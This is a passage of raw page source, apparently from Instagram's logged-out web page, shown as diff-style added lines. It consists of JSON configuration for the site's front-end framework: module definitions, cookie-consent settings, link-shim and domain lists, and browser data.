<script type="application/json" data-content-len="49" data-sjs="">{"require":[["replaceNativeTimer",null,null,[]]]}</script>
|
28
|
+
<script type="application/json" data-content-len="60" data-sjs="">{"require":[["bootstrapWebSession",null,null,[1742162437]]]}</script>
|
29
|
+
<script type="application/json" data-content-len="148" data-sjs="">{"require":[["qplTagServerJS",null,null,[["ssr_disabled_reason:fail_ssr_disabled","comet_aa_coinflip:true","should_use_bt_safe_js","logged_out"]]]]}</script>
|
30
|
+
<script type="application/json" data-content-len="80" data-sjs="">{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","tierOne"]]]}</script>
|
31
|
+
<script type="application/json" data-content-len="478" data-sjs="">{"require":[["CometSSRMergedContentInjector","ssrInit",null,[{"enabled":false,"cavalry_get_lid":"7482530692769266283","success_status":"success","disabled_status":"fail_ssr_disabled","bad_preloaders_status":"fail_bad_preloaders","eid":"mount_0_0_N9","should_ignore_static_id":true,"gks":{"comet_ssr_wait_for_dev":false,"mwp_ssr_enabled":true,"stop_render_at_splashscreen":false,"use_content_visibility_hidden":true,"comet_ssr_unhide_early":false},"is_in_crawler_mode":false}]]]}</script>
|
32
|
+
<script type="application/json" data-content-len="82" data-sjs="">{"require":[["JSScheduler","makeSchedulerGlobalEntry",null,["null",false,false]]]}</script>
|
33
|
+
<script type="application/json" data-content-len="102172" data-sjs="">{"require":[["ScheduledServerJS","handle",null,[{"__bbox":{"define":[["cr:310",["RunWWW"],{"__rc":["RunWWW",null]},-1],["cr:1078",[],{"__rc":[null,null]},-1],["cr:1080",["unexpectedUseInComet"],{"__rc":["unexpectedUseInComet",null]},-1],["cr:1126",["TimeSliceSham"],{"__rc":["TimeSliceSham",null]},-1],["cr:3725",["clearTimeoutWWWOrMobile"],{"__rc":["clearTimeoutWWWOrMobile",null]},-1],["cr:4344",["setTimeoutWWWOrMobile"],{"__rc":["setTimeoutWWWOrMobile",null]},-1],["cr:6640",[],{"__rc":[null,null]},-1],["cr:7385",["clearIntervalWWW"],{"__rc":["clearIntervalWWW",null]},-1],["cr:7386",["clearTimeoutWWW"],{"__rc":["clearTimeoutWWW",null]},-1],["cr:7388",["setIntervalWWW"],{"__rc":["setIntervalWWW",null]},-1],["cr:7389",["setIntervalAcrossTransitionsWWW"],{"__rc":["setIntervalAcrossTransitionsWWW",null]},-1],["cr:7390",["setTimeoutWWW"],{"__rc":["setTimeoutWWW",null]},-1],["cr:7391",["setTimeoutAcrossTransitionsWWW"],{"__rc":["setTimeoutAcrossTransitionsWWW",null]},-1],["cr:8959",["DTSG"],{"__rc":["DTSG",null]},-1],["cr:8960",["DTSG_ASYNC"],{"__rc":["DTSG_ASYNC",null]},-1],["cr:696703",["JSScheduler"],{"__rc":["JSScheduler",null]},-1],["cr:806696",["clearTimeoutComet"],{"__rc":["clearTimeoutComet",null]},-1],["cr:807042",["setTimeoutComet"],{"__rc":["setTimeoutComet",null]},-1],["cr:896461",["setIntervalComet"],{"__rc":["setIntervalComet",null]},-1],["cr:896462",["setIntervalComet"],{"__rc":["setIntervalComet",null]},-1],["cr:925100",["RunComet"],{"__rc":["RunComet",null]},-1],["cr:986633",["setTimeoutComet"],{"__rc":["setTimeoutComet",null]},-1],["cr:1003267",["clearIntervalComet"],{"__rc":["clearIntervalComet",null]},-1],["cr:70",["FBInteractionTracingDependencies"],{"__rc":["FBInteractionTracingDependencies",null]},-1],["cr:534",[],{"__rc":[null,null]},-1],["cr:619",["setTimeoutCometLoggingPriWWW"],{"__rc":["setTimeoutCometLoggingPriWWW",null]},-1],["cr:686",[],{"__rc":[null,null]},-1],["cr:734",[],{"__rc":[null,null]},-1],["cr:755",["warningWWW"],{"__rc":["warningWWW",null]},-1],["cr:851",[],{"__rc":[null,null]},-1],["cr:866",[],{"__rc":[null,null]},-1],["cr:873",["InteractionTracing"],{"__rc":["InteractionTracing",null]},-1],["cr:945",[],{"__rc":[null,null]},-1],["cr:984",[],{"__rc":[null,null]},-1],["cr:1033",["FalcoLoggerTransportsDeferred"],{"__rc":["FalcoLoggerTransportsDeferred",null]},-1],["cr:1293",["ReactDOM.classic"],{"__rc":["ReactDOM.classic",null]},-1],["cr:2099",[],{"__rc":[null,null]},-1],["cr:2448",["useHeroBootloadedComponent"],{"__rc":["useHeroBootloadedComponent",null]},-1],["cr:2602",[],{"__rc":[null,null]},-1],["cr:2654",[],{"__rc":[null,null]},-1],["cr:2701",[],{"__rc":[null,null]},-1],["cr:2928",["relay-runtime"],{"__rc":["relay-runtime",null]},-1],["cr:3404",["createRelayQPLLogger"],{"__rc":["createRelayQPLLogger",null]},-1],["cr:3976",[],{"__rc":[null,null]},-1],["cr:4001",[],{"__rc":[null,null]},-1],["cr:4345",[],{"__rc":[null,null]},-1],["cr:4874",[],{"__rc":[null,null]},-1],["cr:5473",[],{"__rc":[null,null]},-1],["cr:5655",[],{"__rc":[null,null]},-1],["cr:5906",[],{"__rc":[null,null]},-1],["cr:7063",["CometErrorBoundary.react"],{"__rc":["CometErrorBoundary.react",null]},-1],["cr:7162",["ReactDOMCompatibilityLayer"],{"__rc":["ReactDOMCompatibilityLayer",null]},-1],["cr:7269",["handleCometErrorCodeSideEffects"],{"__rc":["handleCometErrorCodeSideEffects",null]},-1],["cr:7299",[],{"__rc":[null,null]},-1],["cr:7329",[],{"__rc":[null,null]},-1],["cr:7383",["BanzaiWWW"],{"__rc":["BanzaiWWW",null]},-1],["cr:7422",["ImageDownloadTrackerWWW"],{"__rc":["ImageDownloadTrackerWWW",null]},-1],["cr:7438",[],{"__rc":[null,null]},-1],["cr:7451",[],{"__rc":[null,null]},-1],["cr:7581",["handleCometReauthenticationSideEffects"],{"__rc":["handleCometReauthenticationSideEffects",null]},-1],["cr:7730",["getFbtResult"],{"__rc":["getFbtResult",null]},-1],["cr:7941",[],{"__rc":[null,null]},-1],["cr:8546",["FDSCometTooltip.react"],{"__rc":["FDSCometTooltip.react",null]},-1],["cr:8907",["HeroTracingCoreConfigWWW"],{"__rc":["HeroTracingCoreConfigWWW",null]},-1],["cr:8908",["HeroTracingCoreDependenciesWWW"],{"__rc":["HeroTracingCoreDependenciesWWW",null]},-1],["cr:8958",["FBJSON"],{"__rc":["FBJSON",null]},-1],["cr:9984",[],{"__rc":[null,null]},-1],["cr:11054",[],{"__rc":[null,null]},-1],["cr:11192",[],{"__rc":[null,null]},-1],["cr:13142",[],{"__rc":[null,null]},-1],["cr:719780",[],{"__rc":[null,null]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerComet"],{"__rc":["TimeSpentImmediateActiveSecondsLoggerComet",null]},-1],["cr:955714",[],{"__rc":[null,null]},-1],["cr:994756",["BaseCometModal.react"],{"__rc":["BaseCometModal.react",null]},-1],["cr:1064332",[],{"__rc":[null,null]},-1],["cr:1106516",[],{"__rc":[null,null]},-1],["cr:1108857",[],{"__rc":[null,null]},-1],["cr:1110430",[],{"__rc":[null,null]},-1],["cr:1121434",[],{"__rc":[null,null]},-1],["cr:1132918",[],{"__rc":[null,null]},-1],["cr:1267207",[],{"__rc":[null,null]},-1],["cr:1294158",["React.classic"],{"__rc":["React.classic",null]},-1],["cr:1294159",["ReactDOM.classic"],{"__rc":["ReactDOM.classic",null]},-1],["cr:1467370",["CometRelayScheduler"],{"__rc":["CometRelayScheduler",null]},-1],["cr:1522191",["CometLinkTrackingUtils.facebook"],{"__rc":["CometLinkTrackingUtils.facebook",null]},-1],["cr:1645510",[],{"__rc":[null,null]},-1],["cr:1752405",["QPLAddCometRequestHeaders"],{"__rc":["QPLAddCometRequestHeaders",null]},-1],["cr:1824473",[],{"__rc":[null,null]},-1],["cr:1984081",[],{"__rc":[null,null]},-1],["cr:662",["PolarisBrowserCookieConsentModal.react"],{"__rc":["PolarisBrowserCookieConsentModal.react",null]},-1],["cr:777",[],{"__rc":[null,null]},-1],["cr:1333",[],{"__rc":[null,null]},-1],["cr:2221",["PolarisMobileNav.react"],{"__rc":["PolarisMobileNav.react",null]},-1],["cr:2696",["PolarisDesktopNav.react"],{"__rc":["PolarisDesktopNav.react",null]},-1],["cr:4197",["PolarisLoggedOutCallToAction.react"],{"__rc":["PolarisLoggedOutCallToAction.react",null]},-1],["cr:4347",["PolarisIPFingerprintingLabel.react"],{"__rc":["PolarisIPFingerprintingLabel.react",null]},-1],["cr:5384",[],{"__rc":[null,null]},-1],["cr:5385",[],{"__rc":[null,null]},-1],["cr:5527",[],{"__rc":[null,null]},-1],["cr:5919",[],{"__rc":[null,null]},-1],["cr:5941",[],{"__rc":[null,null]},-1],["cr:6115",[],{"__rc":[null,null]},-1],["cr:6397",[],{"__rc":[null,null]},-1],["cr:7056",[],{"__rc":[null,null]},-1],["cr:7207",["PolarisLandingPageDesktop.react"],{"__rc":["PolarisLandingPageDesktop.react",null]},-1],["cr:7298",[],{"__rc":[null,null]},-1],["cr:7387",["requestIdleCallbackWWW"],{"__rc":["requestIdleCallbackWWW",null]},-1],["cr:7417",[],{"__rc":[null,null]},-1],["cr:7457",["PolarisMobileTopNavLoggedOut.react"],{"__rc":["PolarisMobileTopNavLoggedOut.react",null]},-1],["cr:10761",[],{"__rc":[null,null]},-1],["cr:13684",[],{"__rc":[null,null]},-1],["CometPersistQueryParams",[],{"relative":{},"domain":{"instagram.com":{}}},6231],["GetAsyncParamsExtraData",[],{"extra_data":{}},7511],["BootloaderConfig",[],{"deferBootloads":false,"enableLoadingUnavailableResources":false,"jsRetries":[200,500],"jsRetryAbortNum":2,"jsRetryAbortTime":5,"silentDups":true,"timeout":60000,"tieredLoadingFromTier":100,"hypStep4":true,"phdOn":false,"phdSeparateBitmaps":false,"btCutoffIndex":1340,"fastPathForAlreadyRequired":true,"earlyRequireLazy":false,"enableTimeoutLoggingForNonComet":false,"deferLongTailManifest":true,"lazySoT":false,"translationRetries":[200,500],"translationRetryAbortNum":3,"translationRetryAbortTime":50},329],["CSSLoaderConfig",[],{"timeout":5000,"loadEventSupported":true},619],["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_INSTAGRAM_BUSINESS_PERSON":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,"IS_WORKROOMS_USER":false,"APP_ID":"936619743392459","IS_BUSINESS_DOMAIN":false,"NON_FACEBOOK_USER_ID":"0","IS_INSTAGRAM_USER":1,"IG_USER_EIMU":"0"},270],["DTSGInitialData",[],{},258],["LSD",[],{"token":"AVoAPuZUzO8"},323],["ServerNonce",[],{"ServerNonce":"nkxNZo7wBBkEvmci_47xox"},141],["SiteData",[],{"server_revision":1020949494,"client_revision":1020948869,"push_phase":"C3","pkg_cohort":"HYP:instagram_web_pkg","haste_session":"20163.HYP:instagram_web_pkg.2.1...0","pr":1,"manifest_base_uri":"https:\/\/static.cdninstagram.com","manifest_origin":"instagram","manifest_version_prefix":"","be_one_ahead":true,"is_rtl":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7482530692769266283","semr_host_bucket":"","bl_hash_version":2,"comet_env":7,"wbloks_env":false,"ef_page":"PolarisHomeRoute","compose_bootloads":false,"spin":4,"__spin_r":1020948869,"__spin_b":"trunk","__spin_t":1742162437,"vip":"157.240.14.174"},317],["SprinkleConfig",[],{"param_name":"jazoest","version":2,"should_randomize":false},2111],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["JSErrorLoggingConfig",[],{"appId":936619743392459,"extra":[],"reportInterval":50,"sampleWeight":null,"sampleWeightKey":"__jssesw","projectBlocklist":[]},2776],["ImmediateImplementationExperiments",[],{"prefer_message_channel":true},3419],["DTSGInitData",[],{"token":"","async_get_token":""},3515],["UriNeedRawQuerySVConfig",[],{"uris":["dms.netmng.com","doubleclick.net","r.msn.com","watchit.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","booking.com","nibio.no","myworkdayjobs.com","united-united.com","gcc.gnu.org"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":[1,2],"noCookies":false,"shouldShowCookieBanner":false,"shouldWaitForDeferredDatrCookie":false,"optedInIntegrations":["adobe_marketo_rest_api","chili_piper_api","giphy_media","google_ads_pixel_frame_legacy","google_ads_pixel_legacy","google_ads_remarketing_tag","google_ads_services","google_cached_img","google_double_click_uri_connect","google_fonts_font","google_paid_ads_frame","google_paid_ads_img","google_translate","google_universal_analytics_legacy","google_universal_analytics_legacy_img","google_universal_analytics_legacy_script","linkedin_insight","reachtheworld_s3","twitter_analytics_pixel","twitter_legacy_embed","youtube_embed","advertiser_hosted_pixel","airbus_sat","amazon_media","apps_for_office","arkose_captcha","aspnet_cdn","autodesk_fusion","bing_maps","bing_widget","boku_wallet","bootstrap","box","cardinal_centinel_api","chromecast_extensions","cloudflare_cdnjs","cloudflare_datatables","cloudflare_relay","conversions_api_gateway","demandbase_api","digitalglobe_maps_api","dlocal","dropbox","esri_sat","facebook_sdk","fastly_relay","gmg_pulse_embed_iframe","google_ads_conversions_tag","google_drive","google_fonts_legacy","google_hosted_libraries","google_oauth_api","google_oauth_api_v2","google_recaptcha","here_map_ext","hive_streaming_video","iproov","isptoolbox","jquery","js_delivr","kbank","mathjax","meta_pixel","metacdn","microsoft_excel","microsoft_office_addin","microsoft_onedrive","microsoft_speech","microsoft_teams","mmi_tiles","open_street_map","paypal_billing_agreement","paypal_oauth_api","payu","plaid","platformized_adyen_checkout","plotly","pydata","recruitics","rstudio","salesforce_lighting","stripe","team_center","tripshot","trustly_direct_debit_ach","twilio_voice","unifier","unsplash_api","unsplash_image_loading","vega","yoti_api","youtube_oembed_api","google_apis","google_apis_scripts","google_img","google_tag","google_uri_frame","google_uri_script"],"hasGranularThirdPartyCookieConsent":true,"exemptedIntegrations":["advertiser_hosted_pixel","airbus_sat","amazon_media","apps_for_office","arkose_captcha","aspnet_cdn","autodesk_fusion","bing_maps","bing_widget","boku_wallet","bootstrap","box","cardinal_centinel_api","chromecast_extensions","cloudflare_cdnjs","cloudflare_datatables","cloudflare_relay","conversions_api_gateway","demandbase_api","digitalglobe_maps_api","dlocal","dropbox","esri_sat","facebook_sdk","fastly_relay","gmg_pulse_embed_iframe","google_ads_conversions_tag","google_drive","google_fonts_legacy","google_hosted_libraries","google_oauth_api","google_oauth_api_v2","google_recaptcha","here_map_ext","hive_streaming_video","iproov","isptoolbox","jquery","js_delivr","kbank","mathjax","meta_pixel","metacdn","microsoft_excel","microsoft_office_addin","microsoft_onedrive","microsoft_speech","microsoft_teams","mmi_tiles","open_street_map","paypal_billing_agreement","paypal_oauth_api","payu","plaid","platformized_adyen_checkout","plotly","pydata","recruitics","rstudio","salesforce_lighting","stripe","team_center","tripshot","trustly_direct_debit_ach","twilio_voice","unifier","unsplash_api","unsplash_image_loading","vega","yoti_api","youtube_oembed_api"]},4328],["BootloaderEndpointConfig",[],{"debugNoBatching":false,"maxBatchSize":-1,"endpointURI":"https:\/\/www.instagram.com\/ajax\/bootloader-endpoint\/"},5094],["IntlCurrentLocale",[],{"code":"en_US"},5954],["TransportSelectingClientContextualConfig",[],{"rawConfig":"{\"name\":\"rti\/web_rs_transport_selecting_client\",\"cctype\":\"dense\",\"version\":1,\"policy_id\":\"static\",\"sample_rate\":1000,\"contexts\":[{\"name\":\"method\",\"type\":\"STRING\",\"callsite\":true,\"buckets\":[{\"name\":\"rollout_group_1\",\"strategy\":\"in\",\"values\":[\"FBGQLS:FEEDBACK_LIKE_SUBSCRIBE\",\"Falco\",\"FBLQ:comet_notifications_live_query_experimental\"]},{\"name\":\"rollout_group_6\",\"strategy\":\"in\",\"values\":[\"FBGQLS:COMMENT_CREATE_SUBSCRIBE\",\"FBGQLS:COMMENT_LIKE_SUBSCRIBE\",\"FBGQLS:FEEDBACK_COMMENT_PERMISSION_TOGGLE_SUBSCRIBE\",\"FBGQLS:FEEDBACK_TYPING_SUBSCRIBE\"]},{\"name\":\"rollout_group_4\",\"strategy\":\"regex\",\"values\":[\"FBGQLS:.*\"]},{\"name\":\"rollout_group_3\",\"strategy\":\"regex\",\"values\":[\"FBLQ:.*\"]},{\"name\":\"skywalker\",\"strategy\":\"in\",\"values\":[\"SKY:test_topic\",\"live\/api\/copyright\",\"intern_notify\",\"locplat\/ttm\",\"rti_widget_dashboard\",\"srt\/user_metrics_counter\",\"media_manager_instagram_composer_create_update\",\"cubism_annotations\/fleet_health\",\"srt\/notifications\",\"ads\/reporting\/snapshot\",\"unidash\/widget\",\"cubism_annotations\",\"ads\/reporting\/export\",\"pubx\/notification\/update\",\"ads\/powereditor\/import\",\"lwi_async_create\",\"video_edit\",\"metric_graph_realtime\",\"vcc_video_posting_www\",\"cms\/object_archive_copy_created\",\"cms\/branch_updated\",\"cms\/object_saved\",\"codeless_event_tracking\",\"srt\/job_updated\",\"video_broadcast\",\"video\/broadcast\/error\",\"vcpanel\/api\",\"lwi_everywhere_plugin\",\"commercial_break_v2\",\"advanced_analytics\/query\",\"cubism_annotations\/ads_mastercook_models\",\"gqls\/comment_like_subscribe\",\"live\/api\/copyright\",\"shiba\/mock_bot_error\",\"shiba\/save_state\",\"video_list_publishing_progress_update\",\"assistant_wizard\",\"gizmo\/manage\",\"collab\/presentation\/request\",\"snaptu\/push_notif\"]},{\"name\":\"skywalker_bulletin\",\"strategy\":\"in\",\"values\":[\"www\/sr\/hot_reload\"]},{\"name\":\"rollout_group_5\",\"strategy\":\"regex\",\"values\":[\"Collabri|RealtimeClientSync:.*\"]},{\"name\":\"default\",\"strategy\":\"catch_all\"}]}],\"outputs\":[{\"name\":\"group\",\"type\":\"STRING\"},{\"name\":\"dgwUpsampleMultiplier\",\"type\":\"FLOAT\"}],\"vector\":[\"group1\",\"0.01\",\"group6\",\"0.001\",\"group4\",\"1.0\",\"group3\",\"1.0\",\"skywalker\",\"1.0\",\"skywalker_bulletin\",\"1.0\",\"group5\",\"1.0\",\"default_group\",\"1.0\"],\"vectorDefaults\":[\"default_group\",\"1.0\"],\"timestamp\":1663366072}"},5968],["CookiePrivacySandboxConfig",[],{"is_affected_by_samesite_lax":false},7723],["CookieDomain",[],{"domain":"instagram.com"},6421],["IntlVariationHoldout",[],{"disable_variation":false},6533],["RtiWebRequestStreamClient",[],{"ThrottledMethods":{},"overrideHeaders":{}},6639],["IntlNumberTypeProps",["IntlCLDRNumberType05"],{"module":{"__m":"IntlCLDRNumberType05"}},7027],["JSSelfProfilerTrackedInteractions",[],{"interactions":[{"action":"*","tracePolicy":"*"}]},6918],["ClickIDURLBlocklistSVConfig",[],{"block_list_url":["https:\/\/www.youtube.com\/watch?v=f1J38FlDKxo","https:\/\/www.youtube.com\/watch?v=6xt7nTuO85A"]},7631],["CookieCoreConfig",[],{"_fbp":{"t":7776000,"s":"None"},"csrftoken":{"t":31449600,"s":"None"},"dpr":{"t":604800,"s":"None"},"ds_user_id":{"t":7776000,"s":"None"},"ig_lang":{"t":34560000,"s":"None"},"igd_ls":{"t":34560000,"s":"None"},"locale":{"t":604800,"s":"None"},"wd":{"t":604800,"s":"Lax"}},2104],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|')s\u0001(?:'|')s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT0q1pUWUFVf4PGATpUnvr5wEUlhbXVgpIN3ct8e4RGH0tVUctQG4ChLHQwH9W373ewDgF9qSthSzoA-aTT7cwnG1cpTLrMoWAPHHM_uyJ1kqiWNv-qzNMOSj842O3-i0q7dGr7CxEsG3g","untrusted_link_default_hash":"AT0rr4i6H7O9SY7H8c2ICnDhH32bebwOv_RMkVWpJQ2Q6PeEw28h7hVYku_AZdn7iu8rVgsnVr_4AYk7Z7Jaf39K18tyWW4AuB9CX5mDzxgQfnBfuAJpM0W6cHIlPIySAaTP1u6ordn4cQ","linkshim_host":"l.instagram.com","linkshim_path":"\/","linkshim_enc_param":"e","linkshim_url_param":"u","use_rel_no_opener":true,"use_rel_no_referrer":true,"always_use_https":true,"onion_always_shim":true,"middle_click_requires_event":true,"www_safe_js_mode":"asynclazy","m_safe_js_mode":"MLynx_asynclazy","ghl_param_link_shim":false,"click_ids":null,"is_linkshim_supported":false,"current_domain":"instagram.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27],["NumberFormatConfig",[],{"decimalSeparator":".","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["RelayAPIConfigDefaults",[],{"accessToken":"","actorID":"0","customHeaders":{"X-IG-App-ID":"936619743392459","X-IG-D":"www"},"enableNetworkLogger":false,"enableVerboseNetworkLogger":false,"fetchTimeout":30000,"graphURI":"\/api\/graphql\/","retryDelays":[1000,3000],"useXController":true,"xhrEncoding":null,"subscriptionTopicURI":null,"withCredentials":false,"isProductionEndpoint":false,"workRequestTaggingProduct":null,"encryptionKeyParams":null,"graphBatchURI":"\/api\/graphqlbatch\/"},926],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":"136.0","browserMinorVersion":0,"browserName":"Firefox","browserVersion":136,"deviceName":"Unknown","engineName":"Gecko","engineVersion":"136.0","platformArchitecture":"64","platformName":"Linux","platformVersion":null,"platformFullVersion":null},527],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle\/welcome\/":1,"\/zero\/toggle\/nux\/":1,"\/zero\/toggle\/settings\/":1,"\/fup\/interstitial\/":1,"\/work\/landing":1,"\/work\/login\/":1,"\/work\/email\/":1,"\/ai.php":1,"\/js_dialog_resources\/dialog_descriptions_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/":1,"\/zero_balance_redirect\/":1,"\/zero_balance_redirect":1,"\/zero_balance_redirect\/l\/":1,"\/l.php":1,"\/lsr.php":1,"\/ajax\/dtsg\/":1,"\/checkpoint\/block\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/confirmemail.php":1,"\/policies\/":1,"\/mobile\/internetdotorg\/classifier\/":1,"\/zero\/dogfooding":1,"\/xti.php":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/zero\/af_transition\/":1,"\/mobile\/zero\/af_transition\/action\/":1,"\/mobile\/zero\/freemium\/":1,"\/mobile\/zero\/freemium\/redirect\/":1,"\/mobile\/zero\/freemium\/zero_fup\/":1,"\/privacy\/policy\/":1,"\/privacy\/center\/":1,"\/data\/manifest\/":1,"\/cmon":1,"\/cmon\/":1,"\/4oh4.php":1,"\/autologin.php":1,"\/birthday_help.php":1,"\/checkpoint\/":1,"\/contact-importer\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upsell\/loan\/learnmore\/":1,"\/upsell\/purchase\/":1,"\/upsell\/promos\/upgrade\/":1,"\/upsell\/buy_redirect\/":1,"\/upsell\/loan\/buyconfirm\/":1,"\/upsell\/loan\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,"\/zero\/datapolicy":1,"\/a\/timezone.php":1,"\/a\/bz":1,"\/bz\/reliability":1,"\/r.php":1,"\/mr\/":1,"\/reg\/":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/":1,"\/preconfirmation\/contactpoint_change\/":1,"\/help\/contact\/":1,"\/survey\/":1,"\/upsell\/loyaltytopup\/accept\/":1,"\/settings\/":1,"\/lite\/":1,"\/zero_status_update\/":1,"\/operator_store\/":1,"\/upsell\/":1,"\/wifiauth\/login\/":1}},1478],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["FBDomainsSVConfig",[],{"domains":{"__map":[["www.facebook.com",1],["tfbnw.net",1],["m.beta.facebook.com",1],["touch.beta.facebook.com",1],["www.dev.facebook.com",1],["fb.me",1],["s.fb.com",1],["m.fbjs.facebook.com",1],["facebook.com.es",1],["www.fbjs.facebook.com",1],["m.facebook.com",1],["facebook.fr",1],["fbsbx.com",1],["embed.fbsbx.com",1],["attachment.fbsbx.com",1],["lookaside.fbsbx.com",1],["web.facebook.com",1],["fb.com",1],["messenger.com",1],["secure.facebook.com",1],["secure.my-od.facebook.com",1],["www.my-od.facebook.com",1]]}},3828],["ClickIDDomainBlacklistSVConfig",[],{"domains":["craigslist","tfbnw.net","canadiantire.ca","o2.co.uk","archive.org","reddit.com","redd.it","gmail.com","cvk.gov.ua","electoralsearch.in","yahoo.com","cve.mitre.org","usenix.org","ky.gov","voteohio.gov","vote.pa.gov","oversightboard.com","wi.gov","pbs.twimg.com","media.discordapp.net","vastadeal.com","theaustralian.com.au","alloygator.com","elsmannimmobilien.de","news.com.au","dennisbonnen.com","stoett.com","investorhour.com","perspectivasur.com","bonnegueule.fr","firstent.org","twitpic.com","kollosche.com.au","nau.edu","arcourts.gov","lomberg.de","network4.hu","balloonrace.com","awstrack.me","ic3.gov","sos.wyo.gov","cnpq.br","0.discoverapp.com","apple.com","apple.co","applecard.apple","services.apple","appletvplus.com","applepay.apple","wallet.apple","beatsbydre.com","dinn.com.mx","soriana.com","facebook.sso.datasite.com","fycextras.com","rik.parlament.gov.rs","elections.delaware.gov","dge.sn","facebook.co1.qualtrics.com","instagram.qualtrics.com"]},3829],["CometCustomKeyCommands",[],{"customCommands":{},"areSingleKeysDisabled":null,"modifiedKeyboardShortcutsPreference":4},4521],["CometRelayConfig",[],{"gc_release_buffer_size":50},4685],["TimeSpentWWWCometConfig",[],{"CONFIG":{"0_delay":0,"0_timeout":8,"delay":1000,"timeout":64}},4748],["CometMaxEnqueuedToastsSitevarConfig",[],{"max":2},4763],["QuickMarkersConfig",[],{"pageLoadEventId":"7482530692769266283","pageLoadScriptPath":"\/","sampleWeight":null},4953],["ServerTimeData",[],{"serverTime":1742162437216,"timeOfRequestStart":1742162437156.2,"timeOfResponseStart":1742162437199.8},5943],["InstagramUserAgent",[],{"is_chrome":false,"is_edge":false,"is_edge_chromium_based":false,"is_edge_legacy":false,"is_firefox":true,"is_ig_carbon":false,"is_ig_lite":false,"is_ig_webview":false,"is_barcelona_webview":false,"is_igtv_webview":false,"is_in_app_browser":false,"is_ios":false,"is_android":false,"is_windows_nt":false,"is_ipad":false,"is_macos":false,"is_mobile":false,"is_mobile_safari":false,"is_oculus_browser":false,"is_opera":false,"is_safari":false,"is_supported_browser":true,"is_twitter_webview":false,"is_uc_browser":false,"is_vapid_eligible":true,"is_webview":false,"is_windows_pwa":false,"is_igvr":false,"user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:136.0) 